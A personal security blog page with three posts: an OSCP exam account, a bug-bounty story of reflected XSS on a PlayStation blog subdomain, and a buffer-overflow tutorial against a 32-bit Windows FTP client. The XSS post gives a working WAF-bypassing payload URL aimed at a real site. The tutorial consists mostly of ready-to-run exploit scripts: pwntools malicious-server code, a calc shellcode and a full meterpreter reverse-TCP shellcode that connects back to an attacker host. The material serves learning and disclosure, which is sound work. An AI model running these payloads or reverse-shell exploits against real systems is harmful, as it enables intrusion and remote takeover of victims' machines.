Menu

Windows Buffer Overflow

Into the OSCP Journey

When people heard OSCP, they think the exam like a beast or a monster which will tear them apart. Yes, i did think like them in the past but with proper preparation, any beast or exam can be defeated. I took oscp exam on 27th August 2020 and passed on 31st August 2020. Today i will share you about my experience in the OSCP journey.

What is OSCP?

OSCP (called Offensive Security Certified Professional) is a well known certification in Cyber Security. It is famous for its 100% hands on exam which is really quite challenging. The exam duration is 24 hour(precisely 23 hour & 45 minute). In the exam, you have to do penetration testing on 5 boxes (means 5 computer servers),so the timing is also very important.If you want to know details about oscp, you can google it cuz i’m not going to explain in details.

Preparation

Before doing OSCP, i spent most of my time solving the netsecfocus OSCP like machines from vulnhub and hackthebox. I completed 85% of the machines. Then I decided to purchase the OSCP course on june 27 and got access to labs and materials on july 5. In 20 days, I solved 35 machines from oscp labs including the big 4 which are considered to be difficult but not much difficult as hackthebox hard machines :C . Then i worried about my windows privilege escalation skill and decided to purchase the Tib3rius’s windows privilege escalation course which is really good for beginners.I did that course and just went roughly through the tryhackme oscp learning path. Then i decided to schedule my exam date on 27th August and relax my mind for 5 days before the exam.

For netsecfocus OSCP like machines

https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0

Tib3rius’s windows privilege escalation course

https://www.udemy.com/course/windows-privilege-escalation/

Tryhackme OSCP path

https://tryhackme.com/path/outline/OSCP

Exam Day

I scheduled my time at 7:30 am. A morning time is refreshing and is the best time to start. Due to my poor internet connection, i started at 7:50 am. The internet connection is very important for this exam. The exam is proctored. The proctorer checked the passport for identification and i had to show around the room, under the desk as they asked. I had to screenshare and allowed access protector to my webcam. So i recommend to check the screensharing and webcam before taking exam. As usual i did all the scanning on all boxes while doing bufferoverflow. Before starting exam, I started my windows 7 virutal box on my kali for preparation but it turned out to be very disadvantageous. My laptop was super slow and laggy. I was nervous bcuz of time late and the immunity dubugger was very laggy on my machine. Due to nervous,i made mistakes. I did the bufferoverflow patiently and after one and a half hours i got the flag. Then i saw my masscan did not get any output from one of the machines. I decided to scan it again and then my laptop got hanged. I had to restart my laptop in hurry and emailed the OSCP support about my problems. I reconnected to the exam panel and told about my problems. Then i resumed my exam but sadly i did not output any scan results. So, i decided to scan and did the boxes one after one. At sharp 1:30 pm, I had done 4 boxes and decided to get lunch. After lunch, i decided to do the reporting first because i’m bad at reporting and worried about my screenshots. After checking my report several times and i ended my exam. In the next morning, I submitted my report and got my exam result on 31st August. I passed the OSCP exam on my 1st attempt.

Tips on taking OSCP exam

  • Enumeration is the key [ Once you got access to OSCP student forum, i recommend to read the Alpha & Beta writeups ]
  • Taking screenshots as many as you can
  • Practise reporting
  • Practise boxes without writeups
  • Don’t get very nervous if something happens
  • Proper Preparation
  • Good Laptop, best internet and a good chair

Good Quotes

  • “Try Harder”
  • “Practice makes perfect”
  • “Every battle is won before it is fought”

Story of Playstation(Sony) XSS

Hello all!!! Today i decided to share my finding of xss on subdomain of playstation. It was 1 year ago i think, i started hunting bug on sony websites and first i found directory indexing on [ https://blog.latam.playstation.com/wp-content/ https://blog.latam.playstation.com/wp/wp-includes/ https://blog.us.playstation.com/wp/wp-includes/ https://blog.us.playstation.com/wp-content/ https://blog.br.playstation.com/wp/wp-includes/ https://blog.br.playstation.com/wp-content/ https://rd.playstation.com/ ]

Then i reported to sony and they didn’t accept because they could not find any impact.I didnt understand why they said that :3 and i was like okay.Then I tried to dig more into the folders and found this page [ https://blog.latam.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html ]. I found Qunit 1.21.0 on the page and i decided to find exploit on google. Then i found this page.

There are two pocs and the 2nd poc shows that the parameter testId is vulnerable to xss.So i decided to give it a try.First i injected payload <svg onload=alert(1)> and waf filters it.Then i fuzzed a lot and at last boom! double url encoding bypass the waf.

So the POC link is [ https://blog.us.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html?testId=%25%33%63%25%37%33%25%37%36%25%36%37%25%32%30%25%36%66%25%36%65%25%36%63%25%36%66%25%36%31%25%36%34%25%33%64%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39%25%36%65%25%32%39%25%33%65 ].

Then i reported the bug and they replied back after 3 months and rewarded a swag that was never shipped to me :V .

Thats my story of xss on playstation. Hope you like it. Thanks!!!

Windows Buffer Overflow (32bit ftp)

Today I will show how to exploit the 32bit windows buffer overflow .This is my first post of writing blog post.

What is buffer mean?

Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs

Buffer Overflow?

A buffer overflow occurs when a program or process attempts to write more data to a fixed length block of memory, or buffer, than the buffer is allocated to hold. Since buffers are created to contain a defined amount of data, the extra data can overwrite data values in memory addresses adjacent to the destination buffer unless the program includes sufficient bounds checking to flag or discard data when too much is sent to a memory buffer.

Introduction

There is alot of tutorials about this 32bit ftp windows buffer overflow But I want to use the modern technique while the exploit the windows buffer overflow.Let’s start.

Requirements

  • U can download the 32bit ftp exe file here
  • U can test any windows version.
  • Immunity Debugger
  • Pwntools

First u need to load the 32bit ftp in immunity debugger.

File > open > select the ftp file and open.

When i try run via debugger ,its ask me ftp server ip and port.So we need create the ftp server and let that client ftp connect to us.Let create the simple ftp server using pwntools.

from pwn import *

l = listen(21)

payload ="Sent some strings"

_ = l.wait_for_connection()

l.sendline("220 " + payload)

sudo python test.py

Important ; Once u run the debgger ,every time u need to restart the debugger by pressing ctr+f2 or Debug tab > restart.

Next step . let crash the client ftp with a bunch of “A”

from pwn import *
l = listen(21)

payload ="A"*1000

_ = l.wait_for_connection()

l.sendline("220"+payload)

Great!. It crash . When we focus the EIP in debugger the Stack fill with alot of “A” .(EIP 41414141)

All of the registers have been overwritten by 41 (hex for A). This means that we have a buffer overflow vulnerability on our hands and we have proven that we can overwrite the EIP. At this point, we know that the EIP is located somewhere between 1 and 1000 bytes, but we are not sure where it’s located exactly. What we need to do next is figure out exactly where the EIP is located (in bytes) and attempt to control it.

Next step is to find offset .Let’s find .

from pwn import *

l = listen(21)

payload =cyclic(1000)

_ = l.wait_for_connection()

l.sendline("220 " + payload)

Select the EIP address (786A6161) and find with cyclic_find()

Offset = 989

To execute shellcode, we need to find a JMP/CALL ESP memory address, so EIP will read it and jump to the memory address stored in ESP. When you loaded the FTP client program in Immunity, you saw the kernel32.dll module was also loaded.So we jump that address let the shellcode run.

!mona jmp -r esp -m kernel

U will see 3 jmp esp addresses and 2 call esp addresses .U can use one of them .All addresses is worked.So, let jump this addresses with shellcode.Firstly I will execute the calculator .After this i will show how to generate reverse shell and exploit this.Let’s Pop calculator.

To generate the calc using msfvenom

msfvenom -a x86 –platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b “\x00”

Note: This ftp doesn’t contains any bad characters .So I will not show u how find bad characters in easy way and how avoid them.But I will write in another post .

Ths goal is Buffer + jmp esp + NOP + shellcode .

Why NOP contains in this exploit?

Some attacks consist of making the program jump to a specific address and continue running from there. The injected code has to be loaded previously somehow in that exact location.

Stack randomization and other runtime differences may make the address where the program will jump impossible to predict, so the attacker places a NOP sled in a big range of memory. If the program jumps to anywhere into the sled, it will run all the remaining NOPs, doing nothing, and then will run the payload code, just next to the sled.

The reason the attacker uses the NOP sled is to make the target address bigger: the code can jump anywhere in the sled, instead of exactly at the beginning of the injected code.

A 128-byte NOP sled is just a group of NOP intructions 128 bytes wide.

NOTE #1: NOP (No-OPeration) is an instruction available in most (all?) architectures that does nothing, other than occupying memory and some runtime.

NOTE #2: in architectures with variable length instructions, a NOP instruction is usually just one byte in length, so it can be used as a convenient instruction padding. Unfortunately, that also makes it easy to do a NOP sled.

Ref : https://stackoverflow.com/questions/14760587/how-does-a-nop-sled-work

Let’s go.

from pwn import *

payload ="\x41"*989

#jmp esp address

payload +=p32(0x765A3132)
payload += "\x90" * 30
payload += (

"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
)
l = listen(21)
_ = l.wait_for_connection()

l.sendline("220 " + payload)

Ogay. cacl.exe pop up successfully .now I will generate the reverse shellcode using msfvenom.Coz i wanna control this machine ,popping calc isn’t enough for me :D….

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.255.232 LPORT=4444 -a x86 –platform win -e x86/alpha_mixed -f c -b ‘\x00’

Put the result in python script and run .

from pwn import *
payload ="\x41"*989
#jmp esp address
payload +=p32(0x771F3132)
payload += "\x90"*30
payload += (
"\x89\xe6\xd9\xea\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x6a\x48\x4b\x32\x75\x50\x43\x30\x73\x30\x65\x30\x6c"
"\x49\x6a\x45\x54\x71\x79\x50\x62\x44\x4c\x4b\x66\x30\x70\x30"
"\x4e\x6b\x53\x62\x44\x4c\x4c\x4b\x31\x42\x54\x54\x4c\x4b\x63"
"\x42\x44\x68\x46\x6f\x4c\x77\x53\x7a\x55\x76\x44\x71\x59\x6f"
"\x4c\x6c\x65\x6c\x30\x61\x33\x4c\x46\x62\x46\x4c\x35\x70\x4a"
"\x61\x5a\x6f\x56\x6d\x43\x31\x4a\x67\x58\x62\x49\x62\x61\x42"
"\x30\x57\x6e\x6b\x62\x72\x42\x30\x6c\x4b\x30\x4a\x67\x4c\x6c"
"\x4b\x62\x6c\x66\x71\x30\x78\x49\x73\x57\x38\x46\x61\x5a\x71"
"\x72\x71\x6c\x4b\x61\x49\x71\x30\x37\x71\x6b\x63\x6c\x4b\x37"
"\x39\x57\x68\x79\x73\x45\x6a\x30\x49\x4c\x4b\x64\x74\x4e\x6b"
"\x67\x71\x79\x46\x30\x31\x39\x6f\x6e\x4c\x69\x51\x5a\x6f\x76"
"\x6d\x36\x61\x6b\x77\x67\x48\x59\x70\x73\x45\x38\x76\x54\x43"
"\x63\x4d\x7a\x58\x45\x6b\x51\x6d\x44\x64\x73\x45\x6d\x34\x46"
"\x38\x6e\x6b\x50\x58\x64\x64\x76\x61\x69\x43\x35\x36\x4e\x6b"
"\x44\x4c\x62\x6b\x6e\x6b\x52\x78\x75\x4c\x43\x31\x4a\x73\x4c"
"\x4b\x47\x74\x6e\x6b\x77\x71\x4e\x30\x4b\x39\x31\x54\x65\x74"
"\x55\x74\x43\x6b\x43\x6b\x35\x31\x51\x49\x63\x6a\x50\x51\x4b"
"\x4f\x4b\x50\x71\x4f\x51\x4f\x50\x5a\x6c\x4b\x62\x32\x5a\x4b"
"\x4e\x6d\x63\x6d\x72\x48\x56\x53\x55\x62\x73\x30\x53\x30\x35"
"\x38\x34\x37\x70\x73\x67\x42\x63\x6f\x51\x44\x42\x48\x50\x4c"
"\x44\x37\x54\x66\x35\x57\x6e\x69\x58\x68\x69\x6f\x68\x50\x6c"
"\x78\x6c\x50\x46\x61\x33\x30\x53\x30\x46\x49\x69\x54\x46\x34"
"\x36\x30\x75\x38\x46\x49\x6f\x70\x70\x6b\x35\x50\x4b\x4f\x4b"
"\x65\x43\x5a\x46\x6a\x32\x48\x46\x6a\x76\x69\x69\x6f\x58\x68"
"\x45\x38\x37\x72\x57\x70\x44\x51\x63\x6c\x6e\x69\x49\x76\x66"
"\x30\x72\x70\x42\x70\x56\x30\x37\x30\x56\x30\x57\x30\x32\x70"
"\x51\x78\x68\x6a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x49\x45\x7a"
"\x37\x72\x4a\x32\x30\x50\x56\x31\x47\x62\x48\x7a\x39\x6d\x75"
"\x53\x44\x33\x51\x69\x6f\x79\x45\x4b\x35\x4f\x30\x62\x54\x57"
"\x7a\x6b\x4f\x62\x6e\x43\x38\x71\x65\x7a\x4c\x69\x78\x63\x57"
"\x65\x50\x65\x50\x33\x30\x43\x5a\x63\x30\x63\x5a\x34\x44\x53"
"\x66\x30\x57\x42\x48\x44\x42\x5a\x79\x6b\x78\x31\x4f\x49\x6f"
"\x7a\x75\x6e\x63\x79\x68\x63\x30\x53\x4e\x76\x56\x4c\x4b\x55"
"\x66\x63\x5a\x47\x30\x65\x38\x63\x30\x34\x50\x55\x50\x35\x50"
"\x61\x46\x63\x5a\x73\x30\x33\x58\x53\x68\x6f\x54\x51\x43\x5a"
"\x45\x39\x6f\x7a\x75\x4d\x43\x72\x73\x71\x7a\x63\x30\x31\x46"
"\x43\x63\x71\x47\x52\x48\x63\x32\x79\x49\x39\x58\x43\x6f\x69"
"\x6f\x6b\x65\x4c\x43\x6b\x48\x35\x50\x33\x4d\x65\x78\x52\x78"
"\x35\x38\x55\x50\x63\x70\x35\x50\x47\x70\x50\x6a\x77\x70\x70"
"\x50\x43\x58\x56\x6b\x36\x4f\x56\x6f\x76\x50\x79\x6f\x49\x45"
"\x36\x37\x32\x48\x34\x35\x72\x4e\x42\x6d\x73\x51\x39\x6f\x6a"
"\x75\x31\x4e\x33\x6e\x69\x6f\x66\x6c\x66\x44\x44\x4f\x4e\x65"
"\x42\x50\x39\x6f\x49\x6f\x69\x6f\x59\x79\x6f\x6b\x6b\x4f\x39"
"\x6f\x59\x6f\x56\x61\x6a\x63\x76\x49\x49\x56\x64\x35\x59\x51"
"\x69\x53\x6f\x4b\x78\x70\x6c\x75\x6c\x62\x70\x56\x63\x5a\x63"
"\x30\x61\x43\x49\x6f\x5a\x75\x41\x41"
)
l = listen(21)
_ = l.wait_for_connection()
l.sendline("220 " + payload)

Wait for connection in another terminal .

Gotcha..!!!

Let Break !

Exploit development is the long way journey .It’s endless, We just need to run. πŸ˜€ πŸ˜€

If u face any trouble during testing .Just ping me.

./ht00lay

Scroll to top